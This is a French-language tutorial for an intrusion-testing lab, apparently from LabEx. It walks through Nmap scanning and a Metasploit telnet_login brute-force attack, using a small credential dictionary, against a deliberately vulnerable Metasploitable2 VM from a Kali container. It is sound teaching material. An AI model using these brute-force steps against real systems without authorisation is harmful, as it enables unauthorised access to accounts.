Introduction
Dans ce laboratoire, nous allons apprendre à exploiter la vulnérabilité du service Telnet et à effectuer une attaque par test d'intrusion. Le scénario implique l'utilisation de la machine Kali Linux comme machine attaquante et de la machine virtuelle Metasploitable2 comme cible. L'objectif est d'analyser la machine cible à la recherche de vulnérabilités, d'identifier la faille du service Telnet et de l'exploiter à l'aide du framework Metasploit.
Démarrer l'environnement de laboratoire
Dans cette étape, nous allons démarrer l'environnement de laboratoire, qui comprend le conteneur Kali Linux et la machine virtuelle Metasploitable2.
- Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2
Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.
- Testez la connectivité avec la machine cible en envoyant un ping :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
- Lancez le conteneur Kali Linux et accédez à l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
- À l'intérieur du conteneur Kali, testez la connexion réseau vers la machine cible :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
Désormais, la machine attaquante et la machine cible sont opérationnelles, et vous pouvez commencer le test d'intrusion.
Remarque : Si vous quittez accidentellement le bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et entrer dans le bash pour poursuivre l'expérience.
Effectuer une analyse de vulnérabilité
Dans cette étape, nous utiliserons Nmap pour scanner la machine cible à la recherche de ports et de services ouverts.
Tout d'abord, démarrez la base de données PostgreSQL, car Metasploit en a besoin pour le stockage des données :
service postgresql start
msfdb init
cd ~
msfconsole
Dans la console Metasploit, exécutez l'analyse Nmap sur la machine cible :
nmap -sV -T4 192.168.122.102
L'option -sV analyse les ports ouverts et affiche des informations détaillées, tandis que -T4 définit la politique de temporisation de l'analyse (de 0 à 5, les valeurs élevées sont plus rapides mais plus bruyantes).
Analyser les résultats de l'analyse
Dans cette étape, nous analyserons les résultats de l'analyse Nmap pour identifier le service Telnet vulnérable.
La sortie de l'analyse Nmap montre que le service Telnet est en cours d'exécution sur le port 23 avec la bannière "Linux telnetd". Recherchons le module Metasploit correspondant :
search scanner/telnet
Utilisez le module auxiliary/scanner/telnet/telnet_login :
use auxiliary/scanner/telnet/telnet_login
Affichez les options du module :
show options
L'option requise est RHOSTS, qui spécifie le ou les hôtes cibles.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Préparer le dictionnaire d'utilisateurs et de mots de passe
Dans cette étape, nous allons préparer les fichiers de dictionnaire d'utilisateurs et de mots de passe pour l'attaque par force brute.
Revenez au shell du conteneur Kali avant de créer les fichiers. Si vous êtes toujours dans msfconsole, appuyez sur Ctrl+D pour revenir au shell du conteneur. Votre invite de commande devrait ressembler à root@...:/#.
Créez /username.txt avec les noms d'utilisateurs suivants :
cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF
Créez /password.txt avec les mots de passe suivants :
cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF
Ces fichiers seront utilisés comme dictionnaires pour l'attaque par force brute.
Configurer le module Metasploit
Dans cette étape, nous configurerons le module Metasploit avec l'hôte cible, le dictionnaire d'utilisateurs et le dictionnaire de mots de passe.
Tout d'abord, si vous n'êtes pas dans la console Metasploit, démarrez-la :
cd ~
msfconsole
Utilisez le module auxiliary/scanner/telnet/telnet_login :
use auxiliary/scanner/telnet/telnet_login
Définissez l'hôte cible :
set RHOSTS 192.168.122.102
Définissez le fichier de dictionnaire des noms d'utilisateurs :
set USER_FILE /username.txt
Définissez le fichier de dictionnaire des mots de passe :
set PASS_FILE /password.txt
Enfin, exécutez l'exploit :
exploit
Metasploit commencera à essayer différentes combinaisons d'utilisateurs et de mots de passe à partir des dictionnaires fournis. Si des identifiants valides sont trouvés, ils seront affichés en vert.
Dans ce cas, les identifiants valides sont msfadmin/msfadmin.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Résumé
Dans ce laboratoire, nous avons appris à exploiter la vulnérabilité du service Telnet à l'aide du framework Metasploit. Nous avons commencé par configurer l'environnement de laboratoire avec la machine attaquante Kali Linux et la machine cible Metasploitable2. Nous avons ensuite effectué une analyse de vulnérabilité à l'aide de Nmap pour identifier le service Telnet ouvert. Ensuite, nous avons préparé les dictionnaires d'utilisateurs et de mots de passe et configuré le module Metasploit avec l'hôte cible et les fichiers de dictionnaire. Enfin, nous avons exécuté l'exploit et réussi à trouver les identifiants de connexion Telnet par force brute.
Ce laboratoire a permis d'acquérir une expérience pratique des tests d'intrusion, de l'analyse de vulnérabilité et de l'utilisation du framework Metasploit pour exploiter des failles. Il a mis en évidence l'importance de pratiques de sécurité robustes concernant les mots de passe et les risques potentiels liés à l'utilisation d'identifiants faibles ou facilement devinables.



